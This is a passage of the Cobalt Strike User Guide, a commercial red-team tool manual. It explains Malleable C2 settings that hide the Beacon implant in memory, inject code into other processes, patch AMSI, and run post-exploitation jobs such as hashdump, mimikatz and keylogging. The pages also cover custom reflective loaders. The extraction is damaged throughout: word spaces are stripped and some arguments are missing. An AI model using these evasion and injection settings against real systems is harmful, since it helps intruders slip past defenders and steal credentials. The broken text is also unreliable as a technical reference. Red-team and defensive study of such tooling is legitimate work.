+Beaconagentwithoutwalkingkernel32EAT
+CobaltStrikeUserGuide www.fortra.com page:152
+
+MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators
+Option Example Description
+stomppe true AskReflectiveLoadertostompMZ,PE,ande_lfanew
+valuesafteritloadsBeaconpayload
+syscall_method None Setthesystemcallmethodtouseoninitialbeacon
+execution.OptionsareNone,Direct,Indirect.See
+sectionSystemCallsforadditionalinformation.
+userwx false AskReflectiveLoadertouseoravoidRWX
+permissionsforBeaconDLLinmemory
+1.-Themodule_x86andmodule_x64settingnowsupportstheabilitytospecifythestarting
+ordinalvaluetosearchforanexportedfunction.Theoptional0x##partisthestarting
+ordinalvaluespecifiedasaninteger.IfalibraryissetandBeacondoesnotoverwriteitself
+intothememoryspacethenitlikelythelibrarydoesnothaveanexportedfunctionwithan
+ordinalvalueof1through15.Toresolvethisdetermineavalidordinalvalueandspecify
+thisvalueusingtheoptionalsyntax,forexample:setmodule_x64"libtemp.dll+0x90"
+Cloning PE Headers
+ThestageblockhasseveraloptionsthatchangethecharacteristicsofyourBeaconReflective
+DLLtolooklikesomethingelseinmemory.Thesearemeanttocreateindicatorsthatsupport
+analysisexercisesandthreatemulationscenarios.
+Option Example Description
+checksum 0 TheCheckSumvalueinBeacon’sPEheader
+compile_time 14July20098:14:00 ThebuildtimeinBeacon’sPEheader
+entry_point 92145 TheEntryPointvalueinBeacon’sPEheader
+image_size_x64 512000 SizeOfImagevalueinx64Beacon’sPEheader
+image_size_x86 512000 SizeOfImagevalueinx86Beacon’sPEheader
+name beacon.x64.dll TheExportednameoftheBeaconDLL
+rich_header Meta-informationinsertedbythecompiler
+CobaltStrike’sLinuxpackageincludesatool,peclone,toextractheadersfromaDLLand
+presentthemasaready-to-usestageblock:
+./peclone [/path/to/sample.dll]
+In-memory Evasion and Obfuscation
+CobaltStrikeUserGuide www.fortra.com page:153
+
+MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators
+Usethestageblock’sprepend commandtodefeatanalysisthatscansthefirstfewbytesofa
+memorysegmenttolookforsignsofaninjectedDLL.Iftool-specificstringsareusedtodetect
+youragents,changethemwiththestrrep command.
+Ifstrrepisn’tenough,setsleep_mask totrue.ThisdirectsBeacontoobfuscateitselfandit's
+heapin-memorybeforeitgoestosleep.Aftersleeping,Beaconwillde-obfuscateitselfto
+requestandprocesstasks.TheSMBandTCPBeaconswillobfuscatethemselveswhilewaiting
+foranewconnectionorwaitingfordatafromtheirparentsession.
+DecidehowmuchyouwanttolooklikeaDLLinmemory.Ifyouwanttoalloweasydetection,
+setstomppe tofalse.IfyouwouldliketolightlyobfuscateyourBeaconDLLinmemory,set
+stomppetotrue.Ifyou’dliketoupthechallenge,setobfuscate totrue.Thisoptionwilltake
+manystepstoobfuscateyourBeaconstageandthefinalstateoftheDLLinmemory.
+OnewaytofindmemoryinjectedDLLsistolookfortheMZandPEmagicbytesattheir
+expectedlocationsrelativetoeachother.Thesevaluesarenotusuallyobfuscatedasthe
+reflectiveloadingprocessdependsonthem.Theobfuscateoptiondoesnotaffectthesevalues.
+Setmagic_pe totwolettersorbytesthatmarkthebeginningofthePEheader.Setmagic_mz_
+x86 tochangethesemagicbytesinthex86BeaconDLL.Setmagic_mz_x64 forthex64
+BeaconDLL.FollowinstructionsthatchangeCPUstatewithinstructionsthatundothechange.
+Forexample,MZistheeasilyrecognizableheadersequence,butit'salsovalidx86andx64
+instructions.Thefollow-onRE(x86)andAR (x64)arevalidx86andx64instructionsthatundo
+theMZchanges.ThesehintswillchangethemagicvaluesinBeacon'sReflectiveDLLpackage
+andmakethereflectiveloadingprocessusethenewvalues.
+figure67-Disassemblyofdefaultmodule_mz_x86value
+Setuserwx tofalsetoaskBeacon’sloadertoavoidRWXpermissions.Memorysegmentswith
+thesepermissionswillattractextraattentionfromanalystsandsecurityproducts.
+Bydefault,Beacon’sloaderallocatesmemorywithVirtualAlloc.Usetheallocator optionto
+changethis.TheHeapAllocoptionallocatesheapmemoryforBeaconwithRWXpermissions.
+TheMapViewOfFileallocatorallocatesmemoryforBeaconbycreatingananonymousmemory
+mappedfileregioninthecurrentprocess.Modulestompingisanalternativetotheseoptions
+andawaytohaveBeaconexecutefromcovetedimagememory.Setmodule_x86 toaDLLthat
+CobaltStrikeUserGuide www.fortra.com page:154
+
+MalleablePE,ProcessInjection,andPostExploitation/ProcessInjection
+isabouttwiceaslargeastheBeaconpayloaditself.Beacon’sx86loaderwillloadthespecified
+DLL,finditslocationinmemory,andoverwriteit.ThisisawaytosituateBeaconinmemorythat
+Windowsassociateswithafileondisk.It’simportantthattheDLLyouchooseisnotneededby
+theapplicationsyouintendtoresidein.Themodule_x64 optionisthesamestory,butitaffects
+thex64Beacon.
+Ifyou’reworriedabouttheBeaconstagethatinitializestheBeaconDLLinmemory,setcleanup
+totrue.ThisoptionwillfreethememoryassociatedwiththeBeaconstagewhenit’snolonger
+needed.
+Process Injection
+Theprocess-injectblockinMalleableC2profilesshapesinjectedcontentandcontrolsprocess
+injectionbehaviorfortheBeaconpayload.ItalsocontrolsthebehaviorofBeaconObjectFiles
+(BOF)executionwithinthecurrentbeacon.
+process-inject {
+# set how memory is allocated in a remote process for
+injected content
+set allocator "VirtualAllocEx";
+# set how memory is allocated in the current process for BOF
+content
+set bof_allocator "VirtualAlloc";
+set bof_reuse_memory "true";
+# shape the memory characteristics for injected and BOF
+content
+set min_alloc "16384";
+set startrwx "true";
+set userwx "false";
+# transform x86 injected content
+transform-x86 {
+prepend "\x90\x90";
+}
+# transform x64 injected content
+transform-x64 {
+append "\x90\x90";
+}
+# determine how to execute the injected code
+execute {
+CreateThread "ntdll.dll!RtlUserThreadStart";
+SetThreadContext;
+CobaltStrikeUserGuide www.fortra.com page:155
+
+MalleablePE,ProcessInjection,andPostExploitation/ProcessInjection
+RtlCreateUserThread;
+}
+}
+Theprocess-injectblockacceptsseveraloptionsthatcontroltheprocessinjectionprocessin
+Beacon:
+Option Example Description
+allocator VirtualAllocEx Thepreferredmethodtoallocatememoryinthe
+remoteprocess.SpecifyVirtualAllocExor
+NtMapViewOfSection.TheNtMapViewOfSection
+optionisforsame-architectureinjectiononly.
+VirtualAllocExisalwaysusedforcross-archmemory
+allocations.
+bof_allocator VirtualAlloc Thepreferredmethodtoallocatememoryinthe
+currentprocesstoexecuteaBOF.Specify
+VirtualAlloc,MapViewOfFile,orHeapAlloc.
+bof_reuse_memory true ReusetheallocatedmemoryforsubsequentBOF
+executionsotherwisereleasethememory.Memory
+willbeclearedwhennotinuse.Iftheavailable
+amountofmemoryisnotlargeenoughitwillbe
+releasedandallocatedwiththelargersize.
+min_alloc 4096 Minimumamountofmemorytorequestforinjected
+orBOFcontent.
+startrwx false UseRWXasinitialpermissionsforinjectedorBOF
+content.AlternativeisRW.WhenBOFmemoryisnot
+inusethepermissionswillbesetbasedonthis
+setting.
+userwx false UseRWXasfinalpermissionsforinjectedorBOF
+content.AlternativeisRX.
+Thetransform-x86 andtransform-x64 blockspadcontentinjectedbyBeacon.Theseblocks
+supporttwocommands:prependandappend.
+Theprepend commandinsertsastringbeforetheinjectedcontent.Theappend command
+addsastringaftertheinjectedcontent.Makesurethatprependeddataisvalidcodeforthe
+injectedcontent’sarchitecture(x86,x64).Thec2lintprogramdoesnothaveacheckforthis.
+Theexecute blockcontrolsthemethodsBeaconwillusewhenitneedstoinjectcodeintoa
+process.Beaconexamineseachoptionintheexecuteblock,determinesiftheoptionisusable
+forthecurrentcontext,triesthemethodwhenitisusable,andmovesontothenextoptionif
+codeexecutiondidnothappen.Theexecuteoptionsinclude:
+CobaltStrikeUserGuide www.fortra.com page:156
+
+MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection
+Option x86->x64 x64->x86 Notes
+CreateThread Currentprocessonly
+CreateRemoteThread Yes Nocross-session
+NtQueueApcThread
+NtQueueApcThread-s Thisisthe“EarlyBird”
+injectiontechnique.
+Suspendedprocesses(e.g.,
+post-exjobs)only.
+RtlCreateUserThread Yes Yes RiskyonXP-eratargets;uses
+RWXshellcodeforx86->x64
+injection.
+SetThreadContext Yes Suspendedprocesses(e.g.,
+post-exjobs)only.
+TheCreateThread andCreateRemoteThread optionshavevariantsthatspawnasuspended
+threadwiththeaddressofanotherfunction,updatethesuspendedthreadtoexecutethe
+injectedcode,andresumethatthread.Use[function]“module!function+0x##”tospecifythe
+startaddresstospoof.Forremoteprocesses,ntdllandkernel32aretheonlyrecommended
+modulestopullfrom.Theoptional0x##partisanoffsetaddedtothestartaddress.These
+variantsworkx86->x86andx64->x64only.
+Theexecuteoptionsyouchoosemustcoveravarietyofcornercases.Thesecornercases
+includeselfinjection,injectionintosuspendedtemporaryprocesses,cross-sessionremote
+processinjection,x86->x64injection,x64->x86injection,andinjectionwithorwithoutpassing
+anargument.Thec2linttoolwillwarnyouaboutcontextsthatyourexecuteblockdoesnot
+cover.
+Controlling Process Injection
+CobaltStrike4.5addedsupporttoallowuserstodefinetheirownprocessinjectiontechnique
+insteadofusingthebuilt-intechniques.ThisisdonethroughthePROCESS_INJECT_
+SPAWN andPROCESS_INJECT_EXPLICIT hookfunctions.CobaltStrikewillcalloneof
+thesehookfunctionswhenexecutingpostexploitationcommands.Seethesectiononthehook
+foratableofsupportedcommands.
+Thetwohookswillcovermostofthepostexploitationcommands.However,therearesome
+exceptionswhichwillnotusethesehooksandwillcontinuetousethebuilt-intechnique.
+Beacon Command Aggressor Script function
+&bdllspawn
+CobaltStrikeUserGuide www.fortra.com page:157
+
+MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection
+Beacon Command Aggressor Script function
+shell &bshell
+execute-assembly &bexecute_assembly
+Toimplementyourowninjectiontechnique,youwillberequiredtosupplyaBeaconObjectFile
+(BOF)containingyourexecutablecodeforx86and/orx64architecturesandanAggressor
+Scriptfilecontainingthehookfunction.SeetheProcessInjectionHookExamplesinthe
+CommunityKit.
+Sinceyouareimplementingyourowninjectiontechnique,theprocess-injectsettingsinyour
+MalleableC2profilewillnotbeusedunlessyourBOFcallstheBeaconAPIfunction
+BeaconInjectProcessorBeaconInjectTemporaryProcess.Thesefunctionsimplementthe
+defaultinjectionandmostlikelywillnotbeusedunlessitistoimplementafallbacktothe
+defaulttechnique.
+Process Injection Spawn
+ThePROCESS_INJECT_SPAWNhookisusedtodefinethefork&runprocessinjection
+technique.Thefollowingbeaconcommands,aggressorscriptfunctions,andUIinterfaceslisted
+inthetablebelowwillcallthehookandtheusercanimplementtheirowntechniqueorusethe
+built-intechnique.
+Notethefollowing:
+l
+Theelevate,runasadmin,&belevate,&brunasadmin and[beacon] -> Access ->
+Elevate commandswillonlyusethePROCESS_INJECT_SPAWNhookwhenthe
+specifiedexploitusesoneofthelistedaggressorscriptfunctionsinthetable,for
+example&bpowerpick.
+l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
+l The‘(useahash)’notemeansselectacredentialthatreferencesahash.
+JobTypes
+Command Aggressor Script UI
+chromedump
+dcsync &bdcsync
+elevate &belevate [beacon]->Access->Elevate
+[beacon]->Access->GoldenTicket
+CobaltStrikeUserGuide www.fortra.com page:158
+
+MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection
+Command Aggressor Script UI
+hashdump &bhashdump [beacon]->Access->DumpHashes
+keylogger &bkeylogger
+logonpasswords &blogonpasswords [beacon]->Access->RunMimikatz
+[beacon]->Access->MakeToken(usea
+hash)
+mimikatz &bmimikatz
+&bmimikatz_small
+net &bnet [beacon]->Explore->NetView
+portscan &bportscan [beacon]->Explore->PortScan
+powerpick &bpowerpick
+printscreen &bprintscreen
+pth &bpassthehash
+runasadmin &brunasadmin
+[target]->Scan
+screenshot &bscreenshot [beacon]->Explore->Screenshot
+screenwatch &bscreenwatch
+ssh &bssh [target]->Jump->ssh
+ssh-key &bssh_key [target]->Jump->ssh-key
+[target]->Jump->[exploit](useahash)
+Process Injection Explicit
+ThePROCESS_INJECT_EXPLICIThookisusedtodefinetheexplicitprocessinjectiontechnique.
+Thefollowingbeaconcommands,aggressorscriptfunctions,andUIinterfaceslistedinthe
+tablebelowwillcallthehookandtheusercanimplementtheirowntechniqueorusethebuilt-in
+technique.
+Notethefollowing:
+l
+The[ProcessBrowser]interfaceisaccessedby[beacon] -> Explore -> Process List.
+Thereisalsoamultiversionofthisinterfacewhichisaccessedbyselectingmultiple
+sessionsandusingthesameUImenu.WhenintheProcessBrowserusethebuttonsto
+perform additionalcommandsontheselectedprocess.
+CobaltStrikeUserGuide www.fortra.com page:159
+
+MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation
+l
+Thechromedump,dcsync,hashdump,keylogger,logonpasswords,mimikatz,net,
+portscan,printscreen,pth,screenshot,screenwatch,ssh,andssh-key commands
+alsohaveafork&runversion.Tousetheexplicitversionrequiresthepidandarchitecture
+arguments.
+l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
+JobTypes
+Command Aggressor Script UI
+browserpivot &bbrowserpivot [beacon]->Explore->BrowserPivot
+chromedump
+dcsync &bdcsync
+dllinject &bdllinject
+hashdump &bhashdump
+inject &binject [ProcessBrowser]->Inject
+keylogger &bkeylogger [ProcessBrowser]->LogKeystrokes
+logonpasswords &blogonpasswords
+mimikatz &bmimikatz
+&bmimikatz_small
+net &bnet
+portscan &bportscan
+printscreen &bprintscreen
+psinject &bpsinject
+pth &bpassthehash
+screenshot &bscreenshot [ProcessBrowser]->Screenshot(Yes)
+screenwatch &bscreenwatch [ProcessBrowser]->Screenshot(No)
+shinject &bshinject
+ssh &bssh
+ssh-key &bssh_key
+Controlling Post Exploitation
+CobaltStrikeUserGuide www.fortra.com page:160
+
+MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation
+LargerCobaltStrikepost-exploitationfeatures(e.g.,screenshot,keylogger,hashdump,etc.)are
+implementedasWindowsDLLs.Toexecutethesefeatures,CobaltStrikespawnsatemporary
+process,andinjectsthefeatureintoit.Theprocess-injectblockcontrolstheprocessinjection
+step.Thepost-exblockcontrolsthecontentandbehaviorsspecifictoCobaltStrike’spost-
+exploitationfeatures.Withthe4.5releasethesepost-exploitationfeaturesnowsupportexplicit
+injectionintoanexistingprocesswhenusingthe[pid]and[arch]arguments.
+post-ex {
+# control the temporary process we spawn to
+set spawnto_x86 "%windir%\\syswow64\\rundll32.exe";
+set spawnto_x64 "%windir%\\sysnative\\rundll32.exe";
+# change the permissions and content of our post-ex DLLs
+set obfuscate "true";
+# change our post-ex output named pipe names...
+set pipename "evil_####, stuff\\not_##_ev#l";
+# pass key function pointers from Beacon to its child jobs
+set smartinject "true";
+# disable AMSI in powerpick, execute-assembly, and psinject
+set amsi_disable "true";
+# cleanup the post-ex UDRL memory when the post-ex DLL is
+loaded
+set cleanup "true";
+transform-x64 {
+# replace a string in the port scanner dll
+strrepex "PortScanner" "Scanner module is complete"
+"Scan is complete";
+# replace a string in all post exploitation dlls
+strrep "is alive." "is up.";
+}
+transform-x86 {
+# replace a string in the port scanner dll
+strrepex "PortScanner" "Scanner module is complete"
+"Scan is complete";
+# replace a string in all post exploitation dlls
+strrep "is alive." "is up.";
+}
+}
+CobaltStrikeUserGuide www.fortra.com page:161
+
+MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation
+Thespawnto_x86 andspawnto_x64 optionscontrolthedefaulttemporaryprocessBeaconwill
+spawnforitspost-exploitationfeatures.Hereareafewtipsforthesevalues:
+l Alwaysspecifythefullpathtotheprogram youwantBeacontospawn
+l Environmentvariables(e.g.,%windir%)areOKwithinthesepaths.
+l Donotspecify%windir%\system32orc:\windows\system32directly.Alwaysuse
+syswow64(x86)andsysnative(x64).Beaconwilladjustthesevaluestosystem32
+whereit’snecessary.
+l Foranx86spawntovalue,youmustspecifyanx86program.Foranx64spawntovalue,
+youmustspecifyanx64program.
+l Thepathsyouspecify(minustheautomaticsyswow64/sysnativeadjustment)must
+existfrom bothanx64(native)andx86(wow64)viewofthefilesystem.
+Theobfuscate optionscramblesthecontentofthepost-exDLLsandsettlesthepost-ex
+capabilityintomemoryinamoreOPSEC-safeway.It’sverysimilartotheobfuscateanduserwx
+optionsavailableforBeaconviathestageblock.Somelong-runningpost-exDLLswillmaskand
+unmasktheirstringtable,asneeded,whenthisoptionisset.
+Usepipename tochangethenamedpipenamesused,bypost-exDLLs,tosendoutputbackto
+Beacon.Thisoptionacceptsacomma-separatedlistofpipenames.CobaltStrikewillselecta
+randompipenamefromthisoptionwhenitsetsupapost-exploitationjob.Each#inthe
+pipenameisreplacedwithavalidhexcharacteraswell.
+Thesmartinject optiondirectsBeacontoembedkeyfunctionpointers,likeGetProcAddress
+andLoadLibrary,intoitssame-architecturepost-exDLLs.Thisallowspost-exDLLstobootstrap
+themselvesinanewprocesswithoutshellcode-likebehaviorthatisdetectedandmitigatedby
+watchingmemoryaccessestothePEBandkernel32.dll.
+Thethread_hint optionallowsmulti-threadedpost-exDLLstospawnthreadswithaspoofed
+startaddress.Specifythethreadhintas“module!function+0x##”tospecifythestartaddressto
+spoof.Theoptional0x##partisanoffsetaddedtothestartaddress.
+Theamsi_disable optiondirectspowerpick,execute-assembly,andpsinjecttopatchthe
+AmsiScanBufferfunctionbeforeloading.NETorPowerShellcode.ThislimitstheAntimalware
+ScanInterfacevisibilityintothesecapabilities.
+Thecleanup optioncleansupthepost-exUDRLmemorywhenthepost-exDLLisloaded.See
+Post-ex User Defined Reflective DLL Loader on page 163formoreinformationonhowthis
+operateswithacustomizedpost-exUDRL.
+Setthekeylogger optiontoconfigureCobaltStrike'skeystrokelogger.TheGetAsyncKeyState
+option(default)usestheGetAsyncKeyStateAPItoobservekeystrokes.The
+SetWindowsHookExoptionusesSetWindowsHookExtoobservekeystrokes.
+CobaltStrikeUserGuide www.fortra.com page:162
+
+MalleablePE,ProcessInjection,andPostExploitation/Post-exUserDefinedReflectiveDLLLoader
+Thetransform-x86andtransform-x64blockstransformBeacon’sPostExploitationDLLs.
+Theseblockssupporttwocommands:strrepandstrrepex.
+Thestrrep commandreplacesastringwithinallPostExploitationDLLs.Thestrrepex
+commandreplacesastringwithinthespecificPostExploitationDLLs,andithasthefollowing
+syntax:strrepex.Validpost-exnamesare:
+BrowserPivot,ExecuteAssembly,Hashdump,Keylogger,Mimikatz,NetView,PortScanner,
+PowerPick,Screenshot,andSSHAgent.
+Post-ex User Defined Reflective DLL Loader
+CobaltStrike4.9addedsupportforusingcustomerreflectiveloadersforthepost-expayloads.
+ThePost-exUserDefinedReflectiveLoaderexampleispartoftheudrl-vskitintheArsenalKit.
+GottoHelp -> ArsenalanddownloadtheArsenalKit.Yourlicencekeyisrequired.
+APost-exUserDefinedReflectiveLoadercanonlybeappliedtothefollowingpost-exDLLs:
+l browserpivot
+l hashdump
+l invokeassembly
+l keylogger
+l mimikatz
+l netview
+l portscan
+l powershell
+l screenshot
+l sshagent
+Implementation
+ThefollowingAggressorscripthookisprovidedtoallowimplementationofPost-exUser
+DefinedReflectiveLoaders:
+Function Description
+POSTEX_RDLL_GENERATE HookusedtoimplementReflectiveLoaderreplacement
+forpost-exDLLs.ArgumentsprovidedincludeBeaconID,
+GetModuleHandleAaddress,andGetProcAddress
+address.
+CobaltStrikeUserGuide www.fortra.com page:163
+
+MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
+Using Post-ex User Defined Reflective DLL Loaders
+Create/Compileyour ReflectiveLoaders
+ThePost-exUserDefinedReflectiveLoaderexampleispartoftheudrl-vskitintheArsenalKit.
+GottoHelp -> ArsenalanddownloadtheArsenalKit.Yourlicensekeyisrequired.Pleasenote
+thatUserDefinedReflectiveLoadersforBeaconpayloadsandpost-expayloadsareverysimilar
+buthavesomesubtledifferences.
+TheloaderentryfunctioniscalledwiththeWinAPIcallingconvention,andittakesasingle
+LPVOIDargument.Therefore,theentryfunctionmustbedeclaredasfollows:
+void WINAPI ReflectiveLoader(LPVOID loaderArgument)
+Post-exploitationpayloadsassumethattheDLL'sentrypointiscalledwiththefollowingorder
+andarguments:
+DllMain(, DLL_PROCESS_ATTACH, );
+DllMain(, 4, );
+TheRDATA_SECTIONpointargumentisassomelong-runningpost-exploitationpayloads
+obfuscatetheir.rdatasectionduringthewaitingperiod.Itistheloader'sresponsibilitytoprovide
+thefollowingstructuretotheDLL:
+typedef struct {
+char* start; // The start address of the .rdata section
+DWORD length; // The length (Size of Raw Data) of the .rdata section
+DWORD offset; // The obfuscation start offset
+} RDATA_SECTION, *PRDATA_SECTION;
+TheobfuscationstartoffsetensuresthattheImportAddressTable(IAT)willnotbeobfuscated.
+Typically,thisvalueshouldbesettothesizeoftheIMAGE_DIRECTORY_ENTRY_IATData
+Directoryentryasfollows:
+rdata->offset = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_
+ENTRY_IAT].Size;
+User Defined Reflective DLL Loader
+CobaltStrikeUserGuide www.fortra.com page:164
+
+MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
+CobaltStrike4.4addedsupportforusingcustomizedreflectiveloadersforbeaconpayloads.
+TheUserDefinedReflectiveLoader(UDRL)KitisthesourcecodefortheUDRLexample.Goto
+Help -> ArsenalanddownloadtheUDRLKit.Yourlicencekeyisrequired.
+NOTE:
+Thereflectiveloader'sexecutablecodeistheextracted.textsectionfromauserprovided
+compiledobjectfile.Theextractedexecutablecodemustbelessthan100KB.
+Implementation
+ThefollowingAggressorscripthooksareprovidedtoallowimplementationofUserDefined
+ReflectiveLoaders:
+Function Description
+BEACON_RDLL_GENERATE HookusedtoimplementbasicReflectiveLoader
+replacement.
+BEACON_RDLL_SIZE Thishookiscalledwhenpreparingbeaconsand
+allowstheusertoconfiguremorethan5KBspace
+fortheirreflectiveloader(upto100KB).Thishook
+canalsobeusedtoremovetheentirespacefor
+thereflectiveloader.
+BEACON_RDLL_GENERATE_LOCAL HookusedtoimplementadvancedReflective
+Loaderreplacement.Additionalarguments
+providedincludeBeaconID,GetModuleHandleA
+address,andGetProcAddressaddress.
+ThefollowingAggressorscriptfunctionsareprovidedtoextracttheReflectiveLoader
+executablecode(.textsection)fromacompiledobjectfileandinserttheexecutablecodeinto
+thebeaconpayload:
+Function Description
+extract_reflective_loader ExtractstheReflectiveLoaderexecutablecode
+fromabytearraycontainingacompiledobjectfile.
+setup_reflective_loader InsertstheReflectiveLoaderexecutablecodeinto
+thebeaconpayload.
+ThefollowingAggressorscriptfunctionsareprovidedtomodifythebeaconpayloadusing
+informationfromtheMalleableC2profile:
+CobaltStrikeUserGuide www.fortra.com page:165
+
+MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
+Function Description
+setup_strings ApplythestringsdefinedintheMalleableC2profile
+tothebeaconpayload.
+setup_transformations Applythetransformationrulesdefinedinthe
+MalleableC2profiletothebeaconpayload.
+ThefollowingAggressorscriptfunctionisprovidedtoobtaininformationaboutthebeacon
+payloadtoassistwithcustommodificationstothepayload:
+Function Description
+pedump Loadsamapofinformationaboutthebeacon
+payload.Thismapinformationissimilartothe
+outputofthe"peclone"commandwiththe"dump"
+argument.
+ThefollowingAggressorscriptfunctionsareprovidedtoperformcustommodificationstothe
+beaconpayload:
+NOTE:
+Dependingonthecustommodificationsmade(obfuscation,mask,etc...),thereflective
+loadermayhavetoreversethosemodificationswhenloading.
+Function Description
+pe_insert_rich_header InsertrichheaderdataintoBeaconDLLContent.If
+thereisexistingrichheaderinformation,itwillbe
+replaced.
+pe_mask MaskdataintheBeaconDLLContentbasedon
+positionandlength.
+pe_mask_section MaskdataintheBeaconDLLContentbasedon
+positionandlength.
+pe_mask_string MaskastringintheBeaconDLLContentbasedon
+position.
+pe_patch_code PatchcodeintheBeaconDLLContentbasedon
+find/replacein'.text'section'.
+pe_remove_rich_header RemovetherichheaderfromBeaconDLL
+Content.
+pe_set_compile_time_with_long SetthecompiletimeintheBeaconDLLContent.
+pe_set_compile_time_with_string SetthecompiletimeintheBeaconDLLContent.
+CobaltStrikeUserGuide www.fortra.com page:166
+
+MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
+Function Description
+pe_set_export_name SettheexportnameintheBeaconDLLContent.
+pe_set_long Placesalongvalueataspecifiedlocation.
+pe_set_short Placesashortvalueataspecifiedlocation.
+pe_set_string Placesastringvalueataspecifiedlocation.
+pe_set_stringz Placesastringvalueataspecifiedlocationand
+addsazeroterminator.
+pe_set_value_at Setsalongvaluebasedonthelocationresolvedby
+anamefromthePEMap(seepedump).
+pe_stomp Setastringtonullcharacters.Startataspecified
+locationandsetsallcharacterstonulluntilanull
+stringterminatorisreached.
+pe_update_checksum UpdatethechecksumintheBeaconDLLContent.
+Using User Defined Reflective DLL Loaders
+Create/Compileyour ReflectiveLoaders
+TheUserDefinedReflectiveLoader(UDRL)KitisthesourcecodefortheUDRLexample.Goto
+Help -> ArsenalanddownloadtheUDRLKit(yourlicensekeyisrequired).
+ThefollowingistheCobaltStrikeprocessforpreppingbeacons:
+l TheBEACON_RDLL_SIZEhookiscalledwhenpreparingbeacons.
+o Thisgivestheuserachancetoindicatethatmorethan5KBspacewillberequired
+fortheirreflectiveloader.
+o Userscanusebeaconswithspacereservedforareflectiveloaderupto100KB.
+o Whenoverridingavailablereflectiveloaderspaceinthebeacons,thebeaconswill
+bemuchlarger.Infact,theywillbetoolargeforstandardartifactsprovidedby
+CobaltStrike.Userswillneedtoupdatetheirprocesstousecustomizedartifacts
+withlargerreservedspaceforthelargerbeacons.
+o Thiscanbeusedtoremovethereflectiveloaderspacefrom theBeaconDLL.
+CobaltStrikeUserGuide www.fortra.com page:167
+
+MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
+l Beaconsarepatchedwithrequiredsettingsaspayloaddata.
+o ThefollowingarepatchedintoBeaconsforUDRL:
+n ListenerSettings
+n SomeMalleableC2Settings.
+Usingsleepmaskanduserwxrequiresareflectiveloadercapableofcreating
+memoryforthe.textexecutablecodewithRWXpermissions,orthebeacon
+willcrashwhenmasking/unmaskingwriteprotectedmemory.Thedefault
+reflectiveloadersnormallyhandlethis.
+Usingsleepmaskandobfuscaterequiresareflectiveloadercapableof
+removingthe1st4Kblock(Header)oftheDLLastheheaderwillnotbe
+masked.
+o ThefollowingisNOTpatchedintoBeaconsforUDRL:
+n PEModifications
+l BEACON_RDLL_GENERATEisnormallycalled.BEACON_RDLL_GENERATE_LOCALhook
+iscalledwhen:
+o Thefollowingdetermineswhichiscalled:
+n MalleableC2has“.stage.smartinject”seton.
+o Useextract_reflective_loaderfunctiontoextractthereflectiveloader.
+o Usesetup_reflective_loaderfunctiontopatchtheextractedreflectiveloaderinto
+thereflectiveloaderspaceintheBeacons.
+n Iftheloaderistoobigfortheselectedbeacon,youwillseeamessagelike
+this:
+o ReflectiveDLLContentlength(123456)exceedsavailablespace
+(5120).
+n Use“BEACON_RDLL_SIZE”touseabeaconswithlargerReflectiveLoaders.
+o Thereareadditionalfunctionsavailabletohelpinspectandmakemodificationsto
+theBeaconsbasedontheReflectiveLoaderscapabilities.Forexample:
+n Provideobfuscation
+n Patchinaddressesforsmartinjectsupport
+l Beaconsarepatchedintoartifacts.
+o Beaconsthathavebeenbuiltwiththelargerreflectiveloaderspace(per“BEACON_
+RDLL_SIZE”above)willneedtobeloadedintocustomizedartifactswithspaceto
+holdlargebeacons.
+o GotoHelp -> Arsenalfrom alicensedCobaltStriketodownloadtheArtifactKit.
+o Seethe“stagesize”referencesintheseartifactkitfilesprovidedbyCobaltStrike:
+n See“stagesize”referencesinartifactbuildscript.
+n See“stagesize”referencesin‘script.example’
+CobaltStrikeUserGuide www.fortra.com page:168
+
+MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
+Beacon User Data
+BeaconUserData(BUD)isaC-structurethatallowsReflectiveLoaderstopassadditionaldata
+toBeacons.Youcandownloadthebeacon_user_data.hfilehere.Inaddition,theudrl-vskitin
+theArsenalKitincludesanexampleBUDloader.
+PassingBeaconUserData
+TheBUDispassedasapointertotheBeaconbycallingBeacon'sDllMainfunctionwitha
+customreasoningknownasDLL_BEACON_USER_DATA(0x0d).TheBUDmustbegivento
+BeaconbeforethestandardDLL_PROCESS_ATTACHreasonisinvoked.
+BeaconcopiesnecessaryvaluesfromtheBUDduringtheDLL_USER_DATAcall,andthereforeit
+isnotrequiredtokeeptheBUDstructureinmemoryafterthecall.
+VersionNumber
+ThefirstvaluecontainedwithintheBUDstructureistheversionnumber.Thisversionnumberis
+essentialinensuringbackwardcompatibilitybetweendifferentversionsofBeaconsand
+ReflectiveLoaderssinceitallowsnewerBeaconstohandleandutilizetheolderBUDstructure
+withoutcrashing.
+Theversionnumberusesthefollowingformat:0xMMmmPP,where:
+l MM=CobaltStrike’smajorversionnumber
+l mm =CobaltStrike’sminorversionnumber
+l PP=CobaltStrike’spatchversionnumber
+Forexample,0x040900translatestoversionCS 4.9.
+System Calls
+BeaconUserDataallowsaReflectiveLoadertoresolveandpasssystemcallinformationto
+Beacon,whichovertakesBeacon'sdefaultsystemcallresolver.SeeSystem Calls on page 41
+tolearnmore.
+BeaconUserDatahasanSYSCALL_API_ENTRYstructureforeachsupportedSystemCall,and
+theSYSCALL_APIstructureholdstheseentries.Theentrycontainsthefollowingvalues
+CobaltStrikeUserGuide www.fortra.com page:169
+
+MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
+l jmpAddr:TheaddressofthecorrectSystem Callinstructiondependingonsystem
+architecture:
+o x64:thesyscallinstruction
+o WOW64(32-bitonx64):FastSysCallinWOW64
+o Nativex86:KiFastSystemCall
+l sysnum:TheSystem Callnumber
+l fnAddr:TheaddressofthecorrespondingNt*function
